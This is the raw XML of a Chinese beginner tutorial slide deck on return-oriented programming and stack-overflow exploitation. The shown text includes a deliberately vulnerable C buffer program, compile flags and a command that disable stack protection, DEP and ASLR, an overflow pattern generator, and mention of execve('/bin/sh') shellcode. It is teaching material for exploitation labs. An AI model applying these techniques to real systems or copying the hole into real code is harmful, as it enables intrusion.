            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>proc/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>randomize_va_space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33442" y="2847324"/>
            <a:ext cx="46625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//level1.c</a:t>
            </a:r>
          </a:p>
          <a:p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vulnerable_function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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[128];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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read(STDIN_FILENO,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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 256);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char** 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vulnerable_function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write(STDOUT_FILENO, "Hello, World\n", 13);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5483" y="3480180"/>
            <a:ext cx="2123364" cy="1413894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0x01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567"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 程序流劫持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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -o level1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level1.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、栈保护（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Stack Protector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ASLR</a:t>
            </a:r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echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>proc/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>randomize_va_space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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pattern.py create 150 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt; payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>生成长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>150</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的字符串用于测试出溢出点（溢出位置）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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ./level1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调试程序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76" y="3698543"/>
            <a:ext cx="7028571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130"/>
            <a:ext cx="3990476" cy="27047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0x01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567"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 程序流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>劫持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en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ./level1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调试程序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048" y="1263567"/>
            <a:ext cx="8580952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658" y="2589130"/>
            <a:ext cx="3561905" cy="24666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0x01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567"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 程序流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>劫持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en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ./level1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调试程序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26" y="2029572"/>
            <a:ext cx="8862020" cy="4060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4" y="5011730"/>
            <a:ext cx="4009524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0x01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567"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 程序流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>劫持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用一段最简单的执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令的语句作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode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7" y="2435838"/>
            <a:ext cx="4009524" cy="1638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24" y="2435838"/>
            <a:ext cx="5657143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4025</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>456</Paragraphs>
  <Slides>50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宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>入门级ROP</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>0x00 ASLR Configure</vt:lpstr>
      <vt:lpstr> 0x01</vt:lpstr>
      <vt:lpstr> 0x01</vt:lpstr>
      <vt:lpstr> 0x01</vt:lpstr>
      <vt:lpstr> 0x01</vt:lpstr>
      <vt:lpstr> 0x01</vt:lpstr>
      <vt:lpstr> 0x01</vt:lpstr>
      <vt:lpstr> 0x01</vt:lpstr>
      <vt:lpstr>0x02 通过ret2libc绕过DEP防护</vt:lpstr>
      <vt:lpstr>0x02 通过ret2libc绕过DEP防护</vt:lpstr>
      <vt:lpstr>0x02 通过ret2libc绕过DEP防护</vt:lpstr>
      <vt:lpstr>0x03 ROP-通过ROP绕过DEP和ASLR防护</vt:lpstr>
      <vt:lpstr>0x03 ROP-通过ROP绕过DEP和ASLR防护</vt:lpstr>
      <vt:lpstr>0x03 ROP-通过ROP绕过DEP和ASLR防护</vt:lpstr>
      <vt:lpstr>0x03 ROP-通过ROP绕过DEP和ASLR防护</vt:lpstr>
      <vt:lpstr>0x03 ROP-通过ROP绕过DEP和ASLR防护</vt:lpstr>
      <vt:lpstr>0x03 ROP-通过ROP绕过DEP和ASLR防护</vt:lpstr>
      <vt:lpstr>0x03 ROP-通过ROP绕过DEP和ASLR防护</vt:lpstr>
      <vt:lpstr>0x03 ROP-通过ROP绕过DEP和ASLR防护</vt:lpstr>
      <vt:lpstr>0x04 Memory Leak &amp; DynELF - 在不获取目标libc.so的情况下进行ROP攻击</vt:lpstr>
      <vt:lpstr>0x04 Memory Leak &amp; DynELF - 在不获取目标libc.so的情况下进行ROP攻击</vt:lpstr>
      <vt:lpstr>0x04 Memory Leak &amp; DynELF - 在不获取目标libc.so的情况下进行ROP攻击</vt:lpstr>
      <vt:lpstr>0x04 Memory Leak &amp; DynELF - 在不获取目标libc.so的情况下进行ROP攻击</vt:lpstr>
      <vt:lpstr>0x04 Memory Leak &amp; DynELF - 在不获取目标libc.so的情况下进行ROP攻击</vt:lpstr>
      <vt:lpstr>0x04 Memory Leak &amp; DynELF - 在不获取目标libc.so的情况下进行ROP攻击</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>0x00 linux_64与linux_86的区别</vt:lpstr>
      <vt:lpstr>0x01 linux_64 Demo</vt:lpstr>
      <vt:lpstr>0x01 linux_64 Demo</vt:lpstr>
      <vt:lpstr>0x01 linux_x64 Demo</vt:lpstr>
      <vt:lpstr>0x02使用工具寻找gadgets示例</vt:lpstr>
      <vt:lpstr>0x02使用工具寻找gadgets示例</vt:lpstr>
      <vt:lpstr>0x02使用工具寻找gadgets示例</vt:lpstr>
      <vt:lpstr>0x02使用工具寻找gadgets示例</vt:lpstr>
      <vt:lpstr>0x02使用工具寻找gadgets示例</vt:lpstr>
      <vt:lpstr>0x02使用工具寻找gadgets示例</vt:lpstr>
      <vt:lpstr>0x02使用工具寻找gadgets示例</vt:lpstr>
      <vt:lpstr>0x03 通用gadgets</vt:lpstr>
      <vt:lpstr>0x03 通用gadgets</vt:lpstr>
      <vt:lpstr>0x03 通用gadgets</vt:lpstr>
      <vt:lpstr>0x03 通用gadgets</vt:lpstr>
      <vt:lpstr>0x03 通用gadgets</vt:lpstr>
      <vt:lpstr>0x03 通用gadgets</vt:lpstr>
      <vt:lpstr>0x03 通用gadgets</vt:lpstr>
      <vt:lpstr>0x04 总结 </vt:lpstr>
      <vt:lpstr>参考资料</vt:lpstr>
      <vt:lpstr>END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</dc:title>
  <dc:creator>yun he</dc:creator>
  <cp:lastModifiedBy>yun he</cp:lastModifiedBy>
  <cp:revision>117</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-23T03:42:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-08T09:10:58Z</dcterms:modified>
</cp:coreProperties>
</file>